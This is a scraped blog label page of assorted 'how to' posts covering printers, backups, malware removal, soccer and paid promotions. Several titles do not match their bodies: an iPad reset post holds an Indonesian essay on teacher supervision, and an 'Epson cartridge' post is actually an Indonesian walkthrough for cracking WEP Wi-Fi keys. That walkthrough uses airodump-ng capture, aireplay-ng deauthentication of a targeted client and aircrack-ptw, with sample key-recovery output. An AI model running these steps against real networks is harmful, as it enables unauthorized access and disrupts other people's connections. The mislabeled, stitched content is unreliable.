Showing posts with label your. Show all posts
Showing posts with label your. Show all posts

Friday, March 10, 2017

How to Hard Reset Your iPad Quick Tips 0

How to Hard Reset Your iPad Quick Tips 0




BAB I
PENDAHULUAN
 1. 1. Latar Belakang

Jika mereka mengunjungi kelas dan mengamati guru yang sedang melaksanakan proses belajar mengajar, serta mengisi insrtumen yang dibawa, berarti mereka sudah melaksanakan kegiatan supervisi pengajaran.
Pemahaman konsep supervisi seperti yang ditunjukkan pada contoh di atas perlu diluruskan. Sebenarnya kegiatan yang dilakukan supervisor dalam contoh tersebut belum dapat dikatakan kegiatan supervisi pengajaran, sebab belum memberikan pengaruh terhadap peningkatan kualitas penampilan guru dalam mengajar.
Kehidupan manusia selalu dipengaruhi oleh perkembangan ilmu pengetahuan dan teknologi, karena itu manusia harus mampu menyesuaikan diri dengan perubahan tersebut. Begitu pula siswa, sebagai generasi bangsa masa yang akan datang, perlu dipersiapkan sedemikian rupa, sehingga mereka mampu menyesuaikan diri dengan perkembangan yang ada di lingkungannya.
Sekolah sebagai lembaga yang diserahi tugas dan tanggung jawab mempersiapkan generasi penerus perlu terlebih dahulu berbenah diri, antara lain membekali guru-guru dengan pengetahuan dan kemampuan yang diperlukan untuk memperlancar tugas mereka sebagai guru. Salah satu cara yang dianggap efektif untuk meningkatkan kemampuan profesional guru adalah melalui supervisi.

1.2. Rumusan Masalah

Adapun rumusan masalah makalah ini adalah sebagai berikut :
a.       Pengertian dan latar belakang perlunya supervisi pendidikan
b.      Tujuan, peranan dan prinsip supervisi pendidikan
c.       Proses supervisi pendidikan
d.      Teknik-teknik supervisi pendidikan
e.       Peranan guru dalam supervisi pendidikan


1.3. Tujuan Penulisan

Adapun tujuan penulisan makalah ini adalah :
a. Untuk mengetahui pengertian dan latar belakang perlunya supervisi pendidikan
b. Untuk memahami tujuan, peranan dan prinsip supervisi pendidikan
c. Untuk memahami proses supervisi pendidikan
d. Untuk mempelajari teknik-teknik supervisi pendidikan
e. Mengetahui peranan guru dalam supervisi pendidikan
f.  Memenuhi nilai tugas pada mata kuliah Profesi Kependidikan

 BAB II
PEMBAHASAN
 2.1. Pengertian Supervisi Pengajaran

Supervisi pengajaran dalam kenyataannya sering dilaksanakan berbeda dengan  pengertian supervisi lain. Bagi sebagian supervisor di lapangan mengartikan supervisi dengan kegiatan yang sederhana sekali.  Jika mereka mengunjungi kelas dan mengamati guru yang sedang melaksanakan proses belajar mengajar, serta mengisi insrtumen yang dibawa, berarti mereka sudah melaksanakan kegiatan supervisi pengajaran.
Pemahaman konsep supervisi seperti yang ditunjukkan pada contoh di atas perlu diluruskan. Sebenarnya kegiatan yang dilakukan supervisor dalam contoh tersebut belum dapat dikatakan kegiatan supervisi pengajaran, sebab belum memberikan pengaruh terhadap peningkatan kualitas penampilan guru dalam mengajar. Supervisi pengajaran menurut Daresh yang dikutip oleh Bafadal (1992) merupakan upaya membantu guru-guru mengembangkan kemampuannya mencapai tujuan pengajaran.
Glickman dalam Bafadal (1992) mengemukakan bahwa supervisi pengajaran merupakan serangkaian kegiatan yang membantu guru meningkatkan kemampuan mengelola proses belajat mengajar. Adapun yang dikutip Bafadal (1992) mendefinisikan supervisi sebagai perbaikan program pengajaran. Neagley yang dikutip oleh Pidarta (1992) mengemukakan bahwa setiap pelayanan kepada guru-guru yang bertujuan menghasilkan perbaikan instruksional, belajar dari kurikulum dikatakan supervisi.

Supervisi pengajaran perlu dilaksanakan dengan beberapa alasan, yaitu :

1. Hakikat individu
    Guru adalah manusia biasa, pada hakekatnya manusia biasa tidak ada yang   
    sempurna.Begitu pula guru, biasanya guru-guru mempunyai kelebihan dan
    kekurangan,baik dalam hal pengetahuan maupun dalam kemampuan profesional.
    Kelebihan dan kekurangan tersebut perlu dibina dan ditingkatkan melalui kegiatan
    supervisi.
2. Perkembangan ilmu pengetahuan dan teknologi
Available link for download

Read more »

Thursday, February 9, 2017

How to share your printer

How to share your printer


To share your printer
  1. Open Printers and Faxes.
  2. Right-click the printer you want to share, and then click Sharing.
  3. The options you see on the Sharing tab differ depending on whether sharing is enabled on your computer. For instructions on what to do next, click the option that describes what you see on the Sharing tab.
    I see text stating that printer sharing must be turned on
    • You need to enable printer sharing by running the Network Setup Wizard. Start it by clicking the link on the Sharing tab, and then follow the instructions. Once sharing is enabled, begin this procedure again.
    I see options for sharing or not sharing the printer
    1. On the Sharing tab, click Share this printer, and then, in the Share name box, type a name for the shared printer.
    2. If you share the printer with users on different hardware or different operating systems, click Additional Drivers. Click the environment and operating system for the other computers, and then click OK to install the additional drivers. Drivers for users running other versions of Windows (Windows 95, Windows 98, or Windows NT 4.0) are located on the Support CD. Printer drivers for Windows NT 3.1 and Windows NT 3.5 are not included.
    3. Click OK, or, if you have installed additional drivers, click Close.
If you have followed the steps listed above and still cannot share this printer, open Windows Firewall. (To open Windows Firewall, click Start, point to Settings, click Control Panel, click Network and Internet Connections, and then click Windows Firewall.) Then, on the Exceptions tab, select the File and Printer Sharing check box.
Notes
  • To open Printers and Faxes, click Start, point to Settings, click Control Panel, click Printers and Other Hardware, and then click Printers and Faxes.
  • You can also share a printer in Printers and Faxes by clicking the printer you want to share, and then clicking Share this printer under Tasks in the left pane. This option is available only if folders are set to look like a Web page and a printer is selected. For more information, click Related Topics.
  • Printers are not shared by default when you install them on Windows XP Professional, but you can choose to share any printer you install on your computer.
  • When you publish a printer in Active Directory, other users logged onto the Windows domain will be able to search for the printer based on its location and features such as how many pages it prints per minute and whether color printing is supported.


Available link for download

Read more »

Thursday, February 2, 2017

Focus on Your strengths Mario Teguh Daily

Focus on Your strengths Mario Teguh Daily


Do focus on your strengths, and you will become more confident in yourself.

Do not focus on your weaknesses, because doing so will weaken and sadden you.

Mario Teguh

adapted from :https://www.facebook.com/pages/Mario-Teguh-Daily/214430138660502


Available link for download

Read more »

How to Prepare Your Business for a Cyber Attack

How to Prepare Your Business for a Cyber Attack


Are companies doing enough to protect themselves from cyber-attacks? It appears a vast number of UK firms may not be, despite the growing number of warnings from specialists that confidential data is frequently being breached. Cyber-attacks are becoming ever-more sophisticated and targeting a range of organisations regardless of size, a number of which are ill-prepared for such threats, failing to have strong enough security systems in place to deal with them.
How to Prepare Your Business for a Cyber-Attack
Here are some steps you can take to protect your business from such an attack:
Encrypt All Valuable Data and Automate Security:
Encryption is basic good practice for all businesses handling people’s personal information such as bank account numbers, credit card details and other personal data. Yet many businesses fail to routinely do this, even though it’s a technology that can be implemented at a relatively low cost. As Iain Lobban, the head of GCHQ recently said, “Instilling a more security conscious culture throughout your organisation, using the practical approach in the Cyber Security Guidance will make the bad guys’ job harder and won’t cost a fortune.”
When it comes to security, manual processes aren’t sufficient enough to protect your IT system against powerful attacks. Automated systems are less labour intensive and more effective as security devices. You will save your security teams valuable hours if you use tools that can intelligently locate, and automatically alert, only in the occurrence of a real security threat. Also, keeping up-to-date with the latest automatic security technologies lessens the chance of falling victim to the latest malicious cyber predators.
Educate Your Employees:
Employees are vulnerable to cyber-crime. Educating your employees so that they understand the techniques used by cyber-criminals, such as phishing, malware and the misuse of credentials, is of vital importance. Keep workers highly trained on the current cyber threats. They need to know how to recognise a threat, how to deal with it, and how to contain it. If these measures are carried out, the likelihood of malicious attacks being successfully carried out can be greatly reduced.
Use Continuously Monitoring Technologies:
The latest threats are increasingly clever, and are able to disguise themselves as harmless files, slip through defences unnoticed, lie there undisturbed, and later carry out damaging activity. To combat this, you need to use technologies that constantly and continuously monitor all files, including those that appear safe. This will allow you to apply security at a later date to hazardous files that were previously thought to be harmless.
Have an Incident Response Process in Place:
Be prepared. Quick action in the event of an attack could make a real difference to the amount of damage done to your business. Containing a breach of security is very important, and to do this, it is necessary to have a co-ordinated incident response team in place. Even smaller businesses should have a designated person, who is aware of the correct procedures to follow should there be a breach of security. Good practice involves properly documented policies and procedures; for example, companies should provide a step-by-step guide on what to do after a cyber-attack, and have regular reviews and updates. The Verizon 2013 Data Breach Investigations Report found that over one-fifth of organisations took months to contain the breach of security. Make sure your company isn’t one of these.
Hire a Penetration Tester:
Hire a penetration tester to find out just how effective your current security defences are. A penetration tester will, as the name suggests, attempt to penetrate through your current security systems, discovering where your weaknesses are. Money well spent if it means the potential pathway of a future attacker can be blocked.
Companies must face the fact that security breaches can and will happen. The best preparations are holistic in that they involve the latest technologies, the appropriate processes, and the people using them. Cyber-crime can be fought, but the threat of the enemy must first be acknowledged. Not doing so could cost you your business.


Available link for download

Read more »

Friday, January 27, 2017

How To Use FaceBook To Promote Your Business And Make Money

How To Use FaceBook To Promote Your Business And Make Money



Adakah video ini membantu anda? Rasanya banyak lagi yang perlu anda belajar. Mahukan yang lebih? 

Dapatkan segera video koleksi dan tutorial 
"BAGAIMANA MEMBINA PERNIAGAAN INTERNET DAN CARA-CARA UNTUK MEMBUAT DUIT MELALUI INTERNET". 

Hanya RM20.00 sekeping termasuk kos penghantaran.

Jangan buang masa anda dengan masalah sambungan internet yang perlahan untuk memuat turun fail video yang adan belum yakin. Dengan memesang CD/DVD ini, anda akan menjimatkan masa anda. Biar kami yang lakukan untuk anda. Jika anda memesang CD/DVD ini, anda bakal merubah hidup anda. Jangan buang masa anda.

INGAT !!!!

"MASA ITU EMAS"
 
ORDER NOW !!! 
 
Emel kami sekarang di warisan2u@hotmail.com


Available link for download

Read more »

Tuesday, January 24, 2017

How to reset your Epson cartridges spoof

How to reset your Epson cartridges spoof


Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card

$ sudo airmon-ng stop ath0

kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0?

kemudian masukkan

$ iwconfig

Sistem harus merespon sebagai berikut :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?

Step 2 : Start wireless card

$ airmon-ng start wifi0

“9? adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet

respon sistem harus sebagai berikut:

Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?

kemudian masukkan

$ iwconfig

dan pastikan bahwa resppon sistem sebagai berikut

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step 3 : Jalankan airodump-ng

airodump-ng digunakan untuk mengcapture paket dari akses point

$ sudo airodump-ng –channel X –write prefix_for_capture_file interface

misal
$ sudo airodump-ng –channel 3 –write tes ath0

“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.

untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas

$ airodump-ng –write tes ath0

Step 4 : Deauthenticate Clients(optional)

tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.

$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang

misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0

* -a BSSID/Mac address akses point
* -c MAC Address client

* 15 jumlah paket yang dikirim

Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.

$ sudo aircrack-ptw tes-01.cap

atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng

$ sudo aircrack-ng -z tes-01.cap -b mac_ssid

misal

$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx

contoh output :

i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.

Aircrack-ng 1.0 beta1

[00:00:00] Tested 81 keys (got 21872 IVs)

KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)

KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU

Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0? tetapi

$ sudo airmon-ng start wlan0

untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU

pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1? tetapi

$ airmon-ng start eth1

Selamat mencoba

Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”

http://hackcenter.wordpress.com/2010/02/07/hack-wifi-dengan-aircrack-ptw/


Available link for download

Read more »

Give the Best for Your Child

Give the Best for Your Child


Children are a special gift from the Gods given to married couples. Since the time of pregnancy, the child is maintained and cared for so that when born, the child will be born in a normal and healthy state. Every parent wants the best course for their children. This they can achieve by giving attention and affection to the child.

In addition to giving affection to the child, you can give it some clothes and toys that will also train the brain growth. In addition, you can also buy your child good clothing so your child know that you love her. You can buy clothes and toys online at loulouscorner.com. This website is one of the webs that provide equipment for your child. This website has advantages not shared by other web. This website sells the goods with excellent quality that will be comfortable when used by your child. You will find jellycat and appaman products in this web. Beside that, you also find barefoot dreams products. Goods on the web are also guaranteed safe for your child; because the materials used to make these products are the choice materials.

By providing all the best for your child, your child will understand that you really love him. Children have the ability to translate any of our actions. Purchase goods or equipment online for me is more profitable because the price is cheaper than in stores. This website provides anything clothes that you need for your child.


Available link for download

Read more »

Monday, January 23, 2017

How to Extend Battery Life in Your Laptop

How to Extend Battery Life in Your Laptop



Available link for download

Read more »

Saturday, December 17, 2016

How to tell if your account was hacked

How to tell if your account was hacked


How to tell if your account was hacked

Do you think your account was accessed without your permission? We know this can be a worrisome experience. Find out how you can tell if your account has been hacked, and what you can do to secure your account again.
  Important:
  • If you have even the slightest suspicion, immediately change your password. Its always best to error on the side of caution.
  • If you dont have access to your account, use the Yahoo Password Helper to get back in.

Signs that your account has been hacked

  • Changes have been made to your account information.
  • There are logins from locations you dont recognize in your Login Activity page.
  • Your account is sending spam.
  • There are messages in your sent folder that you didnt send.
  • Youre receiving multiple failed delivery messages.
  • You arent receiving expected emails.

Does any of this apply to you?

Review our step-by-step guide to securing your account.


Available link for download

Read more »

Thursday, December 15, 2016

How to Back up your files for windows 7

How to Back up your files for windows 7


Back up your files

To help ensure that you dont lose your files, you should back them up regularly. You can set up automatic backups or manually back up your files at any time.
  1. Click to open Backup and Restore.
  2. Do one of the following:
    • If you have never used Windows Backup before, click Set up backup, and then follow the steps in the wizard.  If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
    • If you have created a backup before, you can wait for your regularly scheduled backup to occur, or you can manually create a new backup by clicking Back up now.  If you are prompted for an administrator password or confirmation, type the password or provide confirmation.

Notes

  • We recommend that you dont back up your files to the same hard disk that Windows is installed on.
  • Always store media used for backups (external hard disks, DVDs, or CDs) in a secure place to prevent unauthorized people from having access to your files; we recommend a fireproof location separate from your computer. You might also consider encrypting the data on your backup.

To create a new, full backup

    After you create your first backup, Windows Backup will add new or changed information to your subsequent backups. If youre saving your backups on a hard drive or network location, Windows Backup will create a new, full backup for you automatically when needed. If youre saving your backups on CDs or DVDs and cant find an existing backup disc, or if you want to create a new backup of all of the files on your computer, you can create a full backup. Heres how to create a full backup:
  1. Click to open Backup and Restore.
  2. In the left pane, click Create new, full backup.

    Note

    • You will only see this option if your backup is being saved on CDs or DVDs.

To set up backup after upgrading from a previous version of Windows

    After you upgrade Windows, you will need to set up Windows Backup, even if you had a scheduled backup in the previous version of Windows. This is because there are several changes to the backup program. Instead of selecting file types to back up, you can have Windows back up data files saved in libraries, on the desktop, and in default Windows folders, or you can choose specific libraries and folders to be backed up. You can also create a system image of your computer. For more information, see How does Windows choose which files to back up?
    To set up your backup, follow these steps:
  1. Click to open Backup and Restore.
  2. Click Set up backup, and then follow the steps in the wizard.  If you are prompted for an administrator password or confirmation, type the password or provide confirmation.


Available link for download

Read more »

Saturday, December 10, 2016

Error 5B00 How to reset your canon ip2700 and ip2772

Error 5B00 How to reset your canon ip2700 and ip2772




In this tutorial im gonna show you how to reset your canon ip2270 or ip2772.


DOWNLOAD the resetter at heres the link

http://adf.ly/q7AqO

1st Part

1. The printer is turned off and the power cord is attached. 
2. Press the RESUME button two seconds.
3. Press the POWER button until the green light is on.
4. Then release the RESUME button, but do not release the POWER button.
5. While the POWER button is still depressed, press the Resume button 5 times. Led will flash alternately orange and green.  
6. When you press the RESUME button 5 times then Release both buttons simultaneously.
7. The Printers Led will flash GREEN.
8. The computer will detect a new device found, just  ignore it.
9. In this state shows that the iP2770 printer is in a state of SERVICE MODE and ready to be reset.


2nd Part

1. Place a Bond paper on your printer.
2. Extract resetter ip2772.rar.
3. Then open the folder and double click the ServiceTool_3200 Ekohasan to run the program.


4. Click the "MAIN", then iP2770 will print one page with the words "D = 000.0 "

5. Then click "EEPROM", and the printer will print the results Resetter iP2770. It will show this results  
"TPage (TTL = 00000)"


6. Turn off the printer by pressing the POWER and turn it on again !!!!ITS DONE!!!




Thanks to ekohasan. :)



Available link for download

Read more »

Friday, October 28, 2016

How to use a few GB off your HDD as RAM and make your computer faster!

How to use a few GB off your HDD as RAM and make your computer faster!



Available link for download

Read more »

Friday, October 21, 2016

Fix Your Credit Right Now!

Fix Your Credit Right Now!


Having credit is a very unpleasant thing. At first we did get help from granting credit. But now people are faced with a reality that they must be immediately pay off their credit that they have. This is certainly not a problem for those of you who have the money to pay off that credit. But for some people who at that time were no money, then this could be a problem.

Financial problems are complicated problems most often faced by the community. Credit is considered as a way to enable them to overcome their financial problems. At first it can help your, but it is not always help you. You must pay the credit that you borrow at a particular time. You need credit repair to overcome your problems. One of the webs that provide facilities that will help you to overcome bad credit is ovationcredit.com. They will help you to fix credit in a way that will not burden you.

Settlement of credit by asking for help from others to solve our financial problems can be a good way of solving credit problems. This website will help you to manage credit by arranging your financial patterns. You will be helped to find appropriate ways to deal the credit in fast time. Ive proven that they are proven to help us so well. You do not need to doubt the quality of their work and professionalisms.



Available link for download

Read more »

Tuesday, October 18, 2016

How To Dribble Soccer Ball With Your Head Up

How To Dribble Soccer Ball With Your Head Up


Keeping your head up is one of the core tenets of dribbling in soccer, along with keeping the ball moving and near your feet. Dribbling a soccer ball is "a case of continually looking up and down," says Wes Harvey, former mens soccer team coach at Morgan State University in Baltimore, Maryland. You have to look down to see the ball and your feet. Then lift your head up to see where your teammates are in relation to the opponent for a possible pass or shot.

Step 1

Tap, poke or kick the ball. Look up as you run to where you need to be for the next dribble. Keep your head up as much as possible as you dribble, especially if you have good peripheral vision, Harvey advises. "The classic thing I say to players is that when you are hitting a baseball, you dont look away; similarly, you look at the ball when you make contact in soccer." After you push the ball forward, look up.

Step 2

Keep your glances down at the ball and your feet brief. "You dont have to stare at the ball," Harvey notes. "You do have to be aware of where it is." Stay conscious of the fact that maintaining excellent field vision is just as important as good control of the ball.

Step 3

Prepare to receive a pass by keeping your head up, especially if you are a forward. Conduct a quick check around you to see where everyone is and which way they are moving, so when the ball comes, you are prepared to dribble or pass -- or hold the ball while looking for a better option. "The problem is, if someone is moving and then cuts in a different direction, if you dont look up, you pass to where they were headed, not where they are headed," Harvey observes.

Step 4

Improve your ability to dribble the ball with your head up by practicing a drill such as Peter Pan Dribbling, described in "The Baffled Parents Guide to Great Soccer Drills." Have a partner hold a soccer ball and run in unpredictable patterns in the center circle of a soccer field. Dribble your own soccer ball to stay in his shadow, keeping your head up to track your partner. Add other pairs of teammates to the center circle, also shadowing each other, to add a higher degree of challenge.

source : http://www.livestrong.com/article/499664-how-to-dribble-a-soccer-ball-with-your-head-up/


Available link for download

Read more »

Thursday, September 29, 2016

How to Remove Malware From Your Windows PC

How to Remove Malware From Your Windows PC


 


Is your computer running slower than usual? Are you getting lots of pop-ups? Have you seen other weird problems crop up? If so, your PC might be infected with a virus, spyware, or other malware--even if you have an antivirus program installed on it. Though other problems, such as hardware issues, can produce similar symptoms, its best to check for malware if you arent sure. But you dont necessarily need to call tech support or the geek across the street to scan for malware--Ill show you how to do it yourself.

Step 1: Enter Safe Mode

Keep your PC disconnected from the Internet, and dont use it until youre ready to clean your PC. This can help prevent the malware from spreading and/or leaking your private data.

If you think your PC may have a malware infection, boot your PC into Microsofts Safe Mode. In this mode, only the minimum required programs and services are loaded. If any malware is set to load automatically when Windows starts, entering in this mode may prevent it from doing so.

To boot into Windows Safe Mode, first shut down your PC. Locate the F8 key on your PCs keyboard; turn the PC on; and as soon as you see anything on the screen, press the F8 key repeatedly. This should bring up the Advanced Boot Options menu; there, select Safe Mode with Networking and press Enter.

You may find that your PC runs noticeably faster in Safe Mode. This could be a sign that your system has a malware infection, or it could mean that you have a lot of legitimate programs that normally start up alongside Windows.

Step 2: Delete Temporary Files

Now that youre in Safe Mode, youll want to run a virus scan. But before you do that, delete your temporary files. Doing this may speed up the virus scanning, free up disk space, and even get rid of some malware. To use the Disk Cleanup utility included with Windows, select Start, All Programs (or just Programs), Accessories, System Tools, Disk Cleanup.

Step 3: Download Malware Scanners

Now youre ready to have a malware scanner do its work--and fortunately, running a scanner is enough to remove most infections. If you already had an antivirus program active on your computer, you should use a different scanner for this malware check, since your current antivirus software may have not detected the malware. Remember, no antivirus program can detect 100 percent of the millions of malware types and variants.

There are two types of antivirus programs. Youre probably more familiar with real-time antivirus programs, which constantly watch for malware. Another option is on-demand scanners, which search for malware infections when you open the program manually and run a scan. You should have only one real-time antivirus program installed at a time, but you can keep a few on-demand scanners handy to run scans with multiple programs, thereby ensuring that youre covered.

If you think your PC is infected, I recommend using an on-demand scanner first and then following up with a full scan by your real-time antivirus program. Among the free (and high-quality) on-demand scanners available are BitDefender Free Edition, Kaspersky Virus Removal Tool, Malwarebytes, Norman Malware Cleaner, and SuperAntiSpyware.

Step 4: Run a Scan With Malwarebytes

For illustrative purposes, Ill describe how to use the Malwarebytes on-demand scanner. To get started, download it. If you disconnected from the Internet for safety reasons when you first suspected that you might be infected, reconnect to it so you can download, install, and update Malwarebytes; then disconnect from the Internet again before you start the actual scanning. If you cant access the Internet or you cant download Malwarebytes on the infected computer, download it on another computer, save it to a USB flash drive, and take the flash drive to the infected computer.

After downloading Malwarebytes, run the setup file and follow the wizard to install the program. Once installed, Malwarebytes will check for updates and launch the app itself. If you get a message about the database being outdated, select Yes to download the updates and then click OK when prompted that they have been successfully installed.

Once the program opens, keep the default scan option (Perform quick scan) selected and click the Scan button.

 
Starting the scan in Malwarebytes.
Though it offers a full-scan option, Malwarebytes recommends that you perform the quick scan first, as that scan usually finds all of the infections anyway. Depending on your computer, the quick scan can take anywhere from 5 to 20 minutes, whereas the full scan might take 30 to 60 minutes or more. While Malwarebytes is scanning, you can see how many files or objects the software has already scanned, and how many of those files it has identified either as being malware or as being infected by malware.

If Malwarebytes automatically disappears after it begins scanning and wont reopen, you probably have a rootkit or other deep infection that automatically kills scanners to prevent them from removing it. Though you can try some tricks to get around this malicious technique, you might be better off reinstalling Windows after backing up your files (as discussed later), in view of the time and effort you may have to expend to beat the malware.

If Malwarebytes quick scan doesnt find any infections, it will show you a text file containing the scan results. If you still think that your system may have acquired some malware, consider running a full scan with Malwarebytes and trying the other scanners mentioned earlier. If Malwarebytes does find infections, itll bring up a dialog box warning you of the discovery. To see what suspect files the scanner detected, click the Scan Results button in the lower right. It automatically selects to remove the ones that are known to be dangerous. If you want to remove other detected items, select them as well. Then click the Remove Selected button in the lower left to get rid of the specified infections.

Removing infections in Malwarebytes.


After removing the infections, Malwarebytes will open a text file listing the scan and removal results; skim through these results to confirm that the antivirus program successfully removed each item. Malwarebytes may also prompt you to restart your PC in order to complete the removal process, which you should do.

If your problems persist after youve run the quick scan and it has found and removed unwanted files, consider running a full scan with Malwarebytes and the other scanners mentioned earlier. If the malware appears to be gone, run a full scan with your real-time antivirus program to confirm that result.


Available link for download

Read more »